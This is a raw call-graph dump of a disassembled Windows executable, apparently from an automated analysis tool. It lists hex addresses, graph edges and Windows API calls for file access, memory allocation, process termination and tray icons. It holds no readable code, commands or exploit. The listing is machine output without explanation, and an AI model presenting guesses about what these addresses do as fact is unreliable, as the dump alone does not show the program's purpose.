1a59b0 ReadFile SetFilePointerEx 98211->98624 98218 1e6a2f _memmove 98213->98218 98625 20794e 59 API calls 2 library calls 98213->98625 98214 1b21ce 98214->98218 98618 1a9b9c 59 API calls Mailbox 98214->98618 98219 1b21e2 Mailbox 98220 1b221c 98219->98220 98221 1a5dcf CloseHandle 98219->98221 98220->98063 98222 1b2210 98221->98222 98222->98220 98619 1a5a1a CloseHandle 98222->98619 98224->98063 98225->98063 98226->98059 98629 1f6636 98227->98629 98229 1f6702 98229->98061 98231 1a99b1 98230->98231 98239 1a99ab 98230->98239 98232 1df9fc __i64tow 98231->98232 98233 1a99f9 98231->98233 98234 1df903 98231->98234 98236 1a99b7 __itow 98231->98236 98330 1c38d8 83 API calls 3 library calls 98233->98330 98241 1c0ff6 Mailbox 59 API calls 98234->98241 98246 1df97b Mailbox _wcscpy 98234->98246 98238 1c0ff6 Mailbox 59 API calls 98236->98238 98240 1a99d1 98238->98240 98248 1a5956 98239->98248 98240->98239 98242 1a7f41 59 API calls 98240->98242 98243 1df948 98241->98243 98242->98239 98244 1c0ff6 Mailbox 59 API calls 98243->98244 98245 1df96e 98244->98245 98245->98246 98247 1a7f41 59 API calls 98245->98247 98331 1c38d8 83 API calls 3 library calls 98246->98331 98247->98246 98332 1a5dcf 98248->98332 98252 1a59a4 98252->98093 98252->98099 98253 1a5981 98253->98252 98344 1a5770 98253->98344 98255 1a5993 98361 1a53db SetFilePointerEx SetFilePointerEx 98255->98361 98257 1a599a 98257->98252 98258 1de030 98257->98258 98362 203696 SetFilePointerEx SetFilePointerEx WriteFile 98258->98362 98260 1de060 98260->98252 98261->98075 98263 1a77c7 59 API calls 98262->98263 98264 1a470f 98263->98264 98265 1a77c7 59 API calls 98264->98265 98266 1a4717 98265->98266 98267 1a77c7 59 API calls 98266->98267 98268 1a471f 98267->98268 98269 1a77c7 59 API calls 98268->98269 98270 1a4727 98269->98270 98271 1a475b 98270->98271 98272 1dd8fb 98270->98272 98273 1a79ab 59 API calls 98271->98273 98274 1a81a7 59 API calls 98272->98274 98275 1a4769 98273->98275 98276 1dd904 98274->98276 98277 1a7e8c 59 API calls 98275->98277 98278 1a7eec 59 API calls 98276->98278 98279 1a4773 98277->98279 98281 1a479e 98278->98281 98280 1a79ab 59 API calls 98279->98280 98279->98281 98284 1a4794 98280->98284 98282 1a47de 98281->98282 98285 1a47bd 98281->98285 98301 1dd924 98281->98301 98378 1a79ab 98282->98378 98287 1a7e8c 59 API calls 98284->98287 98391 1a7b52 98285->98391 98286 1a47ef 98290 1a4801 98286->98290 98293 1a81a7 59 API calls 98286->98293 98287->98281 98288 1dd9f4 98291 1a7d2c 59 API calls 98288->98291 98294 1a4811 98290->98294 98296 1a81a7 59 API calls 98290->98296 98308 1dd9b1 98291->98308 98293->98290 98297 1a81a7 59 API calls 98294->98297 98299 1a4818 98294->98299 98295 1a79ab 59 API calls 98295->98282 98296->98294 98297->98299 98298 1dd9dd 98298->98288 98303 1dd9c8 98298->98303 98300 1a81a7 59 API calls 98299->98300 98310 1a481f Mailbox 98299->98310 98300->98310 98301->98288 98301->98298 98307 1dd95b 98301->98307 98302 1a7b52 59 API calls 98302->98308 98305 1a7d2c 59 API calls 98303->98305 98304 1dd9b9 98306 1a7d2c 59 API calls 98304->98306 98305->98308 98306->98308 98307->98304 98311 1dd9a4 98307->98311 98308->98282 98308->98302 98394 1a7a84 59 API calls 2 library calls 98308->98394 98310->98092 98312 1a7d2c 59 API calls 98311->98312 98312->98308 98314 1df094 98313->98314 98315 1a7ca0 98313->98315 98401 1f8123 59 API calls _memmove 98314->98401 98395 1a7bb1 98315->98395 98318 1a7cac 98318->98101 98322 203e73 98318->98322 98319 1df09e 98320 1a81a7 59 API calls 98319->98320 98321 1df0a6 Mailbox 98320->98321 98402 204696 GetFileAttributesW 98322->98402 98325->98119 98326->98118 98327->98081 98328->98115 98329->98115 98330->98236 98331->98232 98333 1a5de8 98332->98333 98334 1a5962 98332->98334 98333->98334 98335 1a5ded CloseHandle 98333->98335 98336 1a5df9 98334->98336 98335->98334 98337 1a5e12 CreateFileW 98336->98337 98338 1de181 98336->98338 98340 1a5e34 98337->98340 98339 1de187 CreateFileW 98338->98339 98338->98340 98339->98340 98341 1de1ad 98339->98341 98340->98253 98363 1a5c4e 98341->98363 98345 1a578b 98344->98345 98346 1ddfce 98344->98346 98347 1a5c4e 2 API calls 98345->98347 98360 1a581a 98345->98360 98346->98360 98373 1a5e3f 98346->98373 98348 1a57ad 98347->98348 98349 1a538e 59 API calls 98348->98349 98351 1a57b7 98349->98351 98351->98346 98352 1a57c4 98351->98352 98353 1c0ff6 Mailbox 59 API calls 98352->98353 98354 1a57cf 98353->98354 98355 1a538e 59 API calls 98354->98355 98356 1a57da 98355->98356 98357 1a5d20 2 API calls 98356->98357 98358 1a5807 98357->98358 98359 1a5c4e 2 API calls 98358->98359 98359->98360 98360->98255 98361->98257 98362->98260 98364 1a5c68 98363->98364 98365 1a5cef SetFilePointerEx 98364->98365 98366 1de151 98364->98366 98370 1a5cc3 98364->98370 98371 1a5dae SetFilePointerEx 98365->98371 98372 1a5dae SetFilePointerEx 98366->98372 98369 1de16b 98370->98340 98371->98370 98372->98369 98374 1a5c4e 2 API calls 98373->98374 98375 1a5e60 98374->98375 98376 1a5c4e 2 API calls 98375->98376 98377 1a5e74 98376->98377 98377->98360 98379 1a79ba 98378->98379 98380 1a7a17 98378->98380 98379->98380 98382 1a79c5 98379->98382 98381 1a7e8c 59 API calls 98380->98381 98388 1a79e8 _memmove 98381->98388 98383 1a79e0 98382->98383 98384 1def32 98382->98384 98386 1a8087 59 API calls 98383->98386 98385 1a8189 59 API calls 98384->98385 98387 1def3c 98385->98387 98386->98388 98389 1c0ff6 Mailbox 59 API calls 98387->98389 98388->98286 98390 1def5c 98389->98390 98392 1a7faf 59 API calls 98391->98392 98393 1a47c7 98392->98393 98393->98282 98393->98295 98394->98308 98396 1a7be5 _memmove 98395->98396 98397 1a7bbf 98395->98397 98396->98318 98396->98396 98397->98396 98398 1c0ff6 Mailbox 59 API calls 98397->98398 98399 1a7c34 98398->98399 98400 1c0ff6 Mailbox 59 API calls 98399->98400 98400->98396 98401->98319 98403 203e7a 98402->98403 98404 2046b1 FindFirstFileW 98402->98404 98403->98101 98403->98112 98404->98403 98405 2046c6 FindClose 98404->98405 98405->98403 98406->98122 98407->98166 98408->98165 98409->98128 98410->98150 98411->98150 98451 1a7b76 98412->98451 98414 1a65ca 98458 1a766f 98414->98458 98416 1a65e4 Mailbox 98416->98172 98419 1de41f 98468 1ffdba 91 API calls 4 library calls 98419->98468 98420 1a68f9 98420->98416 98469 1ffdba 91 API calls 4 library calls 98420->98469 98421 1a766f 59 API calls 98432 1a63c5 98421->98432 98425 1de42d 98427 1a766f 59 API calls 98425->98427 98426 1a7eec 59 API calls 98426->98432 98428 1de443 98427->98428 98428->98416 98429 1de3bb 98430 1a8189 59 API calls 98429->98430 98431 1de3c6 98430->98431 98436 1c0ff6 Mailbox 59 API calls 98431->98436 98432->98414 98432->98419 98432->98420 98432->98421 98432->98426 98432->98429 98434 1a7faf 59 API calls 98432->98434 98437 1de3eb _memmove 98432->98437 98456 1a60cc 60 API calls 98432->98456 98457 1a5ea1 59 API calls Mailbox 98432->98457 98466 1a5fd2 60 API calls 98432->98466 98467 1a7a84 59 API calls 2 library calls 98432->98467 98435 1a659b CharUpperBuffW 98434->98435 98435->98432 98436->98437 98437->98419 98437->98420 98439 1dfbff 98438->98439 98440 1a9c08 98438->98440 98441 1dfc10 98439->98441 98442 1a7d2c 59 API calls 98439->98442 98444 1c0ff6 Mailbox 59 API calls 98440->98444 98443 1a7eec 59 API calls 98441->98443 98442->98441 98446 1dfc1a 98443->98446 98445 1a9c1b 98444->98445 98445->98446 98447 1a9c26 98445->98447 98448 1a77c7 59 API calls 98446->98448 98450 1a9c34 98446->98450 98449 1a7f41 59 API calls 98447->98449 98447->98450 98448->98450 98449->98450 98450->98175 98452 1c0ff6 Mailbox 59 API calls 98451->98452 98453 1a7b9b 98452->98453 98454 1a8189 59 API calls 98453->98454 98455 1a7baa 98454->98455 98455->98432 98456->98432 98457->98432 98459 1a770f 98458->98459 98460 1a7682 _memmove 98458->98460 98462 1c0ff6 Mailbox 59 API calls 98459->98462 98461 1c0ff6 Mailbox 59 API calls 98460->98461 98463 1a7689 98461->98463 98462->98460 98464 1a76b2 98463->98464 98465 1c0ff6 Mailbox 59 API calls 98463->98465 98464->98416 98465->98464 98466->98432 98467->98432 98468->98425 98469->98416 98471 1a9997 84 API calls 98470->98471 98472 21ce2e 98471->98472 98495 21ce75 Mailbox 98472->98495 98508 21dab9 98472->98508 98474 21d0cd 98475 21d242 98474->98475 98479 21d0db 98474->98479 98558 21dbdc 92 API calls Mailbox 98475->98558 98478 21d251 98478->98479 98480 21d25d 98478->98480 98521 21cc82 98479->98521 98480->98495 98481 1a9997 84 API calls 98498 21cec6 Mailbox 98481->98498 98486 21d114 98536 1c0e48 98486->98536 98489 21d147 98543 1a942e 98489->98543 98490 21d12e 98542 20a0b5 89 API calls 4 library calls 98490->98542 98493 21d139 GetCurrentProcess TerminateProcess 98493->98489 98495->98178 98498->98474 98498->98481 98498->98495 98540 20f835 59 API calls 2 library calls 98498->98540 98541 21d2f3 61 API calls 2 library calls 98498->98541 98500 21d2b8 98500->98495 98503 21d2cc FreeLibrary 98500->98503 98501 21d17f 98555 21d95d 107 API calls _free 98501->98555 98503->98495 98507 21d190 98507->98500 98556 1a8ea0 59 API calls Mailbox 98507->98556 98557 1a9e9c 60 API calls Mailbox 98507->98557 98559 21d95d 107 API calls _free 98507->98559 98509 1a7faf 59 API calls 98508->98509 98510 21dad4 CharLowerBuffW 98509->98510 98560 1ff658 98510->98560 98514 1a77c7 59 API calls 98515 21db0d 98514->98515 98516 1a79ab 59 API calls 98515->98516 98518 21db24 98516->98518 98517 21db6c Mailbox 98517->98498 98519 1a7e8c 59 API calls 98518->98519 98520 21db30 Mailbox 98519->98520 98520->98517 98567 21d2f3 61 API calls 2 library calls 98520->98567 98522 21ccf2 98521->98522 98523 21cc9d 98521->98523 98527 21dd64 98522->98527 98524 1c0ff6 Mailbox 59 API calls 98523->98524 98526 21ccbf 98524->98526 98525 1c0ff6 Mailbox 59 API calls 98525->98526 98526->98522 98526->98525 98528 21df8d Mailbox 98527->98528 98535 21dd87 _strcat _wcscpy __NMSG_WRITE 98527->98535 98528->98486 98529 1a9c9c 59 API calls 98529->98535 98530 1a9cf8 59 API calls 98530->98535 98531 1a9d46 59 API calls 98531->98535 98532 1a9997 84 API calls 98532->98535 98533 1c594c 58 API calls __malloc_crt 98533->98535 98535->98528 98535->98529 98535->98530 98535->98531 98535->98532 98535->98533 98570 205b29 61 API calls 2 library calls 98535->98570 98537 1c0e5d 98536->98537 98538 1c0ef5 VirtualAlloc 98537->98538 98539 1c0ec3 98537->98539 98538->98539 98539->98489 98539->98490 98540->98498 98541->98498 98542->98493 98544 1a9436 98543->98544 98545 1c0ff6 Mailbox 59 API calls 98544->98545 98546 1a9444 98545->98546 98547 1a9450 98546->98547 98571 1a935c 59 API calls Mailbox 98546->98571 98549 1a91b0 98547->98549 98572 1a92c0 98549->98572 98551 1c0ff6 Mailbox 59 API calls 98552 1a925b 98551->98552 98552->98507 98554 1a8ea0 59 API calls Mailbox 98552->98554 98553 1a91bf 98553->98551 98553->98552 98554->98501 98555->98507 98556->98507 98557->98507 98558->98478 98559->98507 98561 1ff683 __NMSG_WRITE 98560->98561 98562 1ff6c2 98561->98562 98565 1ff6b8 98561->98565 98566 1ff769 98561->98566 98562->98514 98562->98520 98565->98562 98568 1a7a24 61 API calls 98565->98568 98566->98562 98569 1a7a24 61 API calls 98566->98569 98567->98517 98568->98565 98569->98566 98570->98535 98571->98547 98573 1a92c9 Mailbox 98572->98573 98574 1df5c8 98573->98574 98579 1a92d3 98573->98579 98575 1c0ff6 Mailbox 59 API calls 98574->98575 98577 1df5d4 98575->98577 98576 1a92da 98576->98553 98579->98576 98580 1a9df0 59 API calls Mailbox 98579->98580 98580->98579 98582 1a77c7 59 API calls 98581->98582 98583 1ff905 98582->98583 98584 1a7b76 59 API calls 98583->98584 98585 1ff919 98584->98585 98586 1ff658 61 API calls 98585->98586 98589 1ff93b 98585->98589 98587 1ff935 98586->98587 98587->98589 98590 1a79ab 59 API calls 98587->98590 98588 1ff658 61 API calls 98588->98589 98589->98588 98591 1ff9b5 98589->98591 98592 1a79ab 59 API calls 98589->98592 98594 1a7c8e 59 API calls 98589->98594 98590->98589 98593 1a79ab 59 API calls 98591->98593 98592->98589 98595 1ff9ce 98593->98595 98594->98589 98596 1a7c8e 59 API calls 98595->98596 98597 1ff9da 98596->98597 98599 1ff9e9 Mailbox 98597->98599 98601 1a80d7 59 API calls 2 library calls 98597->98601 98599->98181 98600->98183 98601->98599 98603 1a56dd 98602->98603 98604 1a5702 98602->98604 98603->98604 98609 1a56ec 98603->98609 98605 1a7eec 59 API calls 98604->98605 98608 20349a 98605->98608 98606 2034c9 98606->98214 98608->98606 98626 203436 ReadFile SetFilePointerEx 98608->98626 98627 1a7a84 59 API calls 2 library calls 98608->98627 98610 1a5c18 59 API calls 98609->98610 98612 2035ba 98610->98612 98613 1a5632 61 API calls 98612->98613 98614 2035c8 98613->98614 98616 2035d8 Mailbox 98614->98616 98628 1a793a 61 API calls Mailbox 98614->98628 98616->98214 98617->98192 98618->98219 98619->98220 98620->98190 98621->98190 98622->98198 98623->98205 98624->98213 98625->98218 98626->98608 98627->98608 98628->98616 98630 1f665e 98629->98630 98631 1f6641 98629->98631 98630->98229 98631->98630 98633 1f6621 59 API calls Mailbox 98631->98633 98633->98631 98634 1a3633 98635 1a366a 98634->98635 98636 1a3688 98635->98636 98637 1a36e7 98635->98637 98675 1a36e5 98635->98675 98641 1a375d PostQuitMessage 98636->98641 98642 1a3695 98636->98642 98639 1dd31c 98637->98639 98640 1a36ed 98637->98640 98638 1a36ca DefWindowProcW 98648 1a36d8 98638->98648 98684 1b11d0 10 API calls Mailbox 98639->98684 98643 1a36f2 98640->98643 98644 1a3715 SetTimer RegisterWindowMessageW 98640->98644 98641->98648 98645 1dd38f 98642->98645 98646 1a36a0 98642->98646 98649 1dd2bf 98643->98649 98650 1a36f9 KillTimer 98643->98650 98644->98648 98651 1a373e CreatePopupMenu 98644->98651 98699 202a16 71 API calls _memset 98645->98699 98652 1a36a8 98646->98652 98653 1a3767 98646->98653 98656 1dd2f8 MoveWindow 98649->98656 98657 1dd2c4 98649->98657 98679 1a44cb Shell_NotifyIconW _memset 98650->98679 98651->98648 98659 1dd374 98652->98659 98660 1a36b3 98652->98660 98682 1a4531 64 API calls _memset 98653->98682 98655 1dd343 98685 1b11f3 341 API calls Mailbox 98655->98685 98656->98648 98665 1dd2c8 98657->98665 98666 1dd2e7 SetFocus 98657->98666 98659->98638 98698 1f817e 59 API calls Mailbox 98659->98698 98668 1a374b 98660->98668 98669 1a36be 98660->98669 98661 1dd3a1 98661->98638 98661->98648 98664 1a375b 98664->98648 98665->98669 98670 1dd2d1 98665->98670 98666->98648 98667 1a370c 98680 1a3114 DeleteObject DestroyWindow Mailbox 98667->98680 98681 1a45df 81 API calls _memset 98668->98681 98669->98638 98686 1a44cb Shell_NotifyIconW _memset 98669->98686 98683 1b11d0 10 API calls Mailbox 98670->98683 98675->98638 98677 1dd368 98687 1a43db 98677->98687 98679->98667 98680->98648 98681->98664 98682->98664 98683->98648 98684->98655 98685->98669 98686->98677 98688 1a4406 _memset 98687->98688 98700 1a4213 98688->98700 98691 1a448b 98693 1a44c1 Shell_NotifyIconW 98691->98693 98694 1a44a5 Shell_NotifyIconW 98691->98694 98695 1a44b3 98693->98695 98694->98695 98704 1a410d 98695->98704 98697 1a44ba 98697->98675 98698->98675 98699->98661 98701 1dd638 98700->98701 98702 1a4227 98700->98702 98701->98702 98703 1dd641 DestroyIcon 98701->98703 98702->98691 98726 203226 62 API calls _W_store_winword 98702->98726 98703->98702 98705 1a4129 98704->98705 98706 1a4200 Mailbox 98704->98706 98707 1a7b76 59 API calls 98705->98707 98706->98697 98708 1a4137 98707->98708 98709 1dd5dd LoadStringW 98708->98709 98710 1a4144 98708->98710 98713 1dd5f7 98709->98713 98711 1a7d2c 59 API calls 98710->98711 98712 1a4159 98711->98712 98712->98713 98714 1a416a 98712->98714 98715 1a7c8e 59 API calls 98713->98715 98716 1a4174 98714->98716 98717 1a4205 98714->98717 98720 1dd601 98715->98720 98719 1a7c8e 59 API calls 98716->98719 98718 1a81a7 59 API calls 98717->98718 98723 1a417e _memset _wcscpy 98718->98723 98719->98723 98721 1a7e0b 59 API calls 98720->98721 98720->98723 98722 1dd623 98721->98722 98725 1a7e0b 59 API calls 98722->98725 98724 1a41e6 Shell_NotifyIconW 98723->98724 98724->98706 98725->98723 98726->98691 98727 1dff06 98728 1dff10 98727->98728 98732 1aac90 Mailbox _memmove 98727->98732 98868 1a8e34 59 API calls Mailbox 98728->98868 98739 1ab685 98732->98739 98740 1aa1b7 98732->98740 98744 1aa097 Mailbox 98732->98744 98746 1a7f41 59 API calls 98732->98746 98758 1f66f4 Mailbox 59 API calls 98732->98758 98760 1c0ff6 59 API calls Mailbox 98732->98760 98761 1ab416 98732->98761 98762 1aa000 341 API calls 98732->98762 98764 1e0c94 98732->98764 98766 1e0ca2 98732->98766 98769 1ab37c 98732->98769 98776 1aade2 Mailbox 98732->98776 98784 21c5f4 98732->98784 98816 207be0 98732->98816 98822 21bf80 98732->98822 98869 1f7405 59 API calls 98732->98869 98870 21c4a7 85 API calls 2 library calls 98732->98870 98734 1c0ff6 59 API calls Mailbox 98734->98744 98736 1ab5da 98878 20a0b5 89 API calls 4 library calls 98736->98878 98738 1ab5d5 98742 1a81a7 59 API calls 98738->98742 98873 20a0b5 89 API calls 4 library calls 98739->98873 98742->98740 98743 1e047f 98872 20a0b5 89 API calls 4 library calls 98743->98872 98744->98734 98744->98736 98744->98738 98744->98740 98744->98743 98747 1a81a7 59 API calls 98744->98747 98749 1a77c7 59 API calls 98744->98749 98751 1f7405 59 API calls 98744->98751 98754 1e0e00 98744->98754 98756 1c2f80 67 API calls __cinit 98744->98756 98759 1aa6ba 98744->98759 98862 1aca20 341 API calls 2 library calls 98744->98862 98863 1aba60 60 API calls Mailbox 98744->98863 98746->98732 98747->98744 98749->98744 98750 1e048e 98751->98744 98753 1f66f4 Mailbox 59 API calls 98753->98740 98877 20a0b5 89 API calls 4 library calls 98754->98877 98756->98744 98758->98732 98876 20a0b5 89 API calls 4 library calls 98759->98876 98760->98732 98867 1af803 341 API calls 98761->98867 98762->98732 98874 1a9df0 59 API calls Mailbox 98764->98874 98875 20a0b5 89 API calls 4 library calls 98766->98875 98768 1e0c86 98768->98740 98768->98753 98865 1a9e9c 60 API calls Mailbox 98769->98865 98771 1ab38d 98866 1a9e9c 60 API calls Mailbox 98771->98866 98776->98739 98776->98740 98776->98768 98777 1e00e0 VariantClear 98776->98777 98778 20d2e5 101 API calls 98776->98778 98779 20d2e6 101 API calls 98776->98779 98780 21e237 130 API calls 98776->98780 98781 1b2123 95 API calls 98776->98781 98782 21474d 341 API calls 98776->98782 98783 22251d 62 API calls 98776->98783 98864 1a9df0 59 API calls Mailbox 98776->98864 98871 1f7405 59 API calls 98776->98871 98777->98776 98778->98776 98779->98776 98780->98776 98781->98776 98782->98776 98783->98776 98785 1a77c7 59 API calls 98784->98785 98786 21c608 98785->98786 98787 1a77c7 59 API calls 98786->98787 98788 21c610 98787->98788 98789 1a77c7 59 API calls 98788->98789 98790 21c618 98789->98790 98791 1a9997 84 API calls 98790->98791 98815 21c626 98791->98815 98792 1a7d2c 59 API calls 98792->98815 98793 21c80f 98794 21c83c Mailbox 98793->98794 98881 1a9b9c 59 API calls Mailbox 98793->98881 98794->98732 98796 21c7f6 98800 1a7e0b 59 API calls 98796->98800 98797 1a7a84 59 API calls 98797->98815 98798 21c811 98801 1a7e0b 59 API calls 98798->98801 98799 1a81a7 59 API calls 98799->98815 98802 21c803 98800->98802 98803 21c820 98801->98803 98805 1a7c8e 59 API calls 98802->98805 98806 1a7c8e 59 API calls 98803->98806 98804 1a7faf 59 API calls 98808 21c6bd CharUpperBuffW 98804->98808 98805->98793 98806->98793 98807 1a7faf 59 API calls 98809 21c77d CharUpperBuffW 98807->98809 98879 1a859a 68 API calls 98808->98879 98880 1ac707 69 API calls 2 library calls 98809->98880 98812 1a7e0b 59 API calls 98812->98815 98813 1a9997 84 API calls 98813->98815 98814 1a7c8e 59 API calls 98814->98815 98815->98792 98815->98793 98815->98794 98815->98796 98815->98797 98815->98798 98815->98799 98815->98804 98815->98807 98815->98812 98815->98813 98815->98814 98817 207bec 98816->98817 98818 1c0ff6 Mailbox 59 API calls 98817->98818 98819 207bfa 98818->98819 98820 207c08 98819->98820 98821 1a77c7 59 API calls 98819->98821 98820->98732 98821->98820 98823 21bfc5 98822->98823 98824 21bfab 98822->98824 98883 21a528 59 API calls Mailbox 98823->98883 98882 20a0b5 89 API calls 4 library calls 98824->98882 98827 21bfd0 98828 1aa000 340 API calls 98827->98828 98829 21c031 98828->98829 98830 21c0c3 98829->98830 98834 21c072 98829->98834 98855 21bfbd Mailbox 98829->98855 98831 21c119 98830->98831 98832 21c0c9 98830->98832 98833 1a9997 84 API calls 98831->98833 98831->98855 98904 207ba4 59 API calls 98832->98904 98835 21c12b 98833->98835 98884 207581 59 API calls Mailbox 98834->98884 98838 1a7faf 59 API calls 98835->98838 98841 21c14f CharUpperBuffW 98838->98841 98839 21c0ec 98905 1a5ea1 59 API calls Mailbox 98839->98905 98840 21c0a2 98885 1af5c0 98840->98885 98845 21c169 98841->98845 98844 21c0f4 Mailbox 98906 1afe40 341 API calls 2 library calls 98844->98906 98846 21c170 98845->98846 98847 21c1bc 98845->98847 98907 207581 59 API calls Mailbox 98846->98907 98849 1a9997 84 API calls 98847->98849 98850 21c1c4 98849->98850 98908 1a9fbd 60 API calls 98850->98908 98853 21c19e 98854 1af5c0 340 API calls 98853->98854 98854->98855 98855->98732 98856 21c1ce 98856->98855 98857 1a9997 84 API calls 98856->98857 98858 21c1e9 98857->98858 98909 1a5ea1 59 API calls Mailbox 98858->98909 98860 21c1f9 98910 1afe40 341 API calls 2 library calls 98860->98910 98862->98744 98863->98744 98864->98776 98865->98771 98866->98761 98867->98739 98868->98732 98869->98732 98870->98732 98871->98776 98872->98750 98873->98768 98874->98768 98875->98768 98876->98740 98877->98736 98878->98740 98879->98815 98880->98815 98881->98794 98882->98855 98883->98827 98884->98840 98886 1af61a 98885->98886 98887 1af7b0 98885->98887 98888 1e4848 98886->98888 98889 1af626 98886->98889 98890 1a7f41 59 API calls 98887->98890 98891 21bf80 341 API calls 98888->98891 99000 1af3f0 341 API calls 2 library calls 98889->99000 98892 1af6ec Mailbox 98890->98892 98894 1e4856 98891->98894 98899 1af743 98892->98899 98901 203e73 3 API calls 98892->98901 98911 21e24b 98892->98911 98914 20cde5 98892->98914 98994 1a4faa 98892->98994 98897 1af790 98894->98897 99002 20a0b5 89 API calls 4 library calls 98894->99002 98896 1af65d 98896->98892 98896->98894 98896->98897 98897->98855 98899->98897 99001 1a9df0 59 API calls Mailbox 98899->99001 98901->98899 98904->98839 98905->98844 98906->98855 98907->98853 98908->98856 98909->98860 98910->98855 98912 21cdf1 130 API calls 98911->98912 98913 21e25b 98912->98913 98913->98899 98915 1a77c7 59 API calls 98914->98915 98916 20ce1a 98915->98916 98917 1a77c7 59 API calls 98916->98917 98918 20ce23 98917->98918 98919 20ce37 98918->98919 99136 1a9c9c 59 API calls 98918->99136 98921 1a9997 84 API calls 98919->98921 98922 20ce54 98921->98922 98923 20cf55 98922->98923 98924 20ce76 98922->98924 98936 20cf85 Mailbox 98922->98936 99003 1a4f3d 98923->99003 98925 1a9997 84 API calls 98924->98925 98927 20ce82 98925->98927 98929 1a81a7 59 API calls 98927->98929 98932 20ce8e 98929->98932 98930 20cf81 98931 1a77c7 59 API calls 98930->98931 98930->98936 98934 20cfb6 98931->98934 98938 20cea2 98932->98938 98939 20ced4 98932->98939 98933 1a4f3d 136 API calls 98933->98930 98935 1a77c7 59 API calls 98934->98935 98937 20cfbf 98935->98937 98936->98899 98941 1a77c7 59 API calls 98937->98941 98942 1a81a7 59 API calls 98938->98942 98940 1a9997 84 API calls 98939->98940 98943 20cee1 98940->98943 98944 20cfc8 98941->98944 98945 20ceb2 98942->98945 98946 1a81a7 59 API calls 98943->98946 98947 1a77c7 59 API calls 98944->98947 98948 1a7e0b 59 API calls 98945->98948 98949 20ceed 98946->98949 98950 20cfd1 98947->98950 98951 20cebc 98948->98951 99137 204cd3 GetFileAttributesW 98949->99137 98954 1a9997 84 API calls 98950->98954 98952 1a9997 84 API calls 98951->98952 98955 20cec8 98952->98955 98957 20cfde 98954->98957 98958 1a7c8e 59 API calls 98955->98958 98956 20cef6 98959 20cf09 98956->98959 98962 1a7b52 59 API calls 98956->98962 98960 1a46f9 59 API calls 98957->98960 98958->98939 98961 1a9997 84 API calls 98959->98961 98969 20cf0f 98959->98969 98963 20cff9 98960->98963 98964 20cf36 98961->98964 98962->98959 98965 1a7b52 59 API calls 98963->98965 99138 203a2b 75 API calls Mailbox 98964->99138 98967 20d008 98965->98967 98968 20d03c 98967->98968 98970 1a7b52 59 API calls 98967->98970 98971 1a81a7 59 API calls 98968->98971 98969->98936 98972 20d019 98970->98972 98973 20d04a 98971->98973 98972->98968 98975 1a7d2c 59 API calls 98972->98975 98974 1a7c8e 59 API calls 98973->98974 98976 20d058 98974->98976 98977 20d02e 98975->98977 98978 1a7c8e 59 API calls 98976->98978 98979 1a7d2c 59 API calls 98977->98979 98980 20d066 98978->98980 98979->98968 98981 1a7c8e 59 API calls 98980->98981 98982 20d074 98981->98982 98983 1a9997 84 API calls 98982->98983 98984 20d080 98983->98984 99027 2042ad 98984->99027 98986 20d091 98987 203e73 3 API calls 98986->98987 98988 20d09b 98987->98988 98989 1a9997 84 API calls 98988->98989 98993 20d0cc 98988->98993 98990 20d0b9 98989->98990 99081 2093df 98990->99081 98992 1a4faa 84 API calls 98992->98936 98993->98992 98995 1a4fbb 98994->98995 98996 1a4fb4 98994->98996 98998 1a4fca 98995->98998 98999 1a4fdb FreeLibrary 98995->98999 98997 1c55d6 __fcloseall 83 API calls 98996->98997 98997->98995 98998->98899 98999->98998 99000->98896 99001->98899 99002->98897 99139 1a4d13 99003->99139 99008 1ddd0f 99011 1a4faa 84 API calls 99008->99011 99009 1a4f68 LoadLibraryExW 99149 1a4cc8 99009->99149 99013 1ddd16 99011->99013 99015 1a4cc8 3 API calls 99013->99015 99017 1ddd1e 99015->99017 99016 1a4f8f 99016->99017 99018 1a4f9b 99016->99018 99175 1a506b 99017->99175 99020 1a4faa 84 API calls 99018->99020 99022 1a4fa0 99020->99022 99022->98930 99022->98933 99024 1ddd45 99183 1a5027 99024->99183 99028 2042c9 99027->99028 99029 2042dc 99028->99029 99030 2042ce 99028->99030 99032 1a77c7 59 API calls 99029->99032 99031 1a81a7 59 API calls 99030->99031 99033 2042d7 Mailbox 99031->99033 99034 2042e4 99032->99034 99033->98986 99035 1a77c7 59 API calls 99034->99035 99036 2042ec 99035->99036 99037 1a77c7 59 API calls 99036->99037 99038 2042f7 99037->99038 99039 1a77c7 59 API calls 99038->99039 99040 2042ff 99039->99040 99041 1a77c7 59 API calls 99040->99041 99042 204307 99041->99042 99043 1a77c7 59 API calls 99042->99043 99044 20430f 99043->99044 99045 1a77c7 59 API calls 99044->99045 99046 204317 99045->99046 99047 1a77c7 59 API calls 99046->99047 99048 20431f 99047->99048 99049 1a46f9 59 API calls 99048->99049 99050 204336 99049->99050 99051 1a46f9 59 API calls 99050->99051 99052 20434f 99051->99052 99053 1a7b52 59 API calls 99052->99053 99054 20435b 99053->99054 99055 20436e 99054->99055 99056 1a7e8c 59 API calls 99054->99056 99057 1a7b52 59 API calls 99055->99057 99056->99055 99058 204377 99057->99058 99059 204387 99058->99059 99060 1a7e8c 59 API calls 99058->99060 99061 1a81a7 59 API calls 99059->99061 99060->99059 99062 204393 99061->99062 99063 1a7c8e 59 API calls 99062->99063 99064 20439f 99063->99064 99610 20445f 59 API calls 99064->99610 99066 2043ae 99611 20445f 59 API calls 99066->99611 99068 2043c1 99069 1a7b52 59 API calls 99068->99069 99070 2043cb 99069->99070 99071 2043d0 99070->99071 99072 2043e2 99070->99072 99073 1a7e0b 59 API calls 99071->99073 99074 1a7b52 59 API calls 99072->99074 99075 2043dd 99073->99075 99076 2043eb 99074->99076 99079 1a7c8e 59 API calls 99075->99079 99077 204409 99076->99077 99078 1a7e0b 59 API calls 99076->99078 99080 1a7c8e 59 API calls 99077->99080 99078->99075 99079->99077 99080->99033 99082 2093ec __write_nolock 99081->99082 99083 1c0ff6 Mailbox 59 API calls 99082->99083 99084 209449 99083->99084 99085 1a538e 59 API calls 99084->99085 99086 209453 99085->99086 99087 2091e9 GetSystemTimeAsFileTime 99086->99087 99088 20945e 99087->99088 99089 1a5045 85 API calls 99088->99089 99090 209471 _wcscmp 99089->99090 99091 209542 99090->99091 99092 209495 99090->99092 99093 2099be 96 API calls 99091->99093 99642 2099be 99092->99642 99109 20950e _wcscat 99093->99109 99097 1a506b 74 API calls 99099 209567 99097->99099 99098 20954b 99098->98993 99100 1a506b 74 API calls 99099->99100 99102 209577 99100->99102 99101 2094c3 _wcscat _wcscpy 99649 1c432e 58 API calls __wsplitpath_helper 99101->99649 99103 1a506b 74 API calls 99102->99103 99105 209592 99103->99105 99106 1a506b 74 API calls 99105->99106 99107 2095a2 99106->99107 99108 1a506b 74 API calls 99107->99108 99110 2095bd 99108->99110 99109->99097 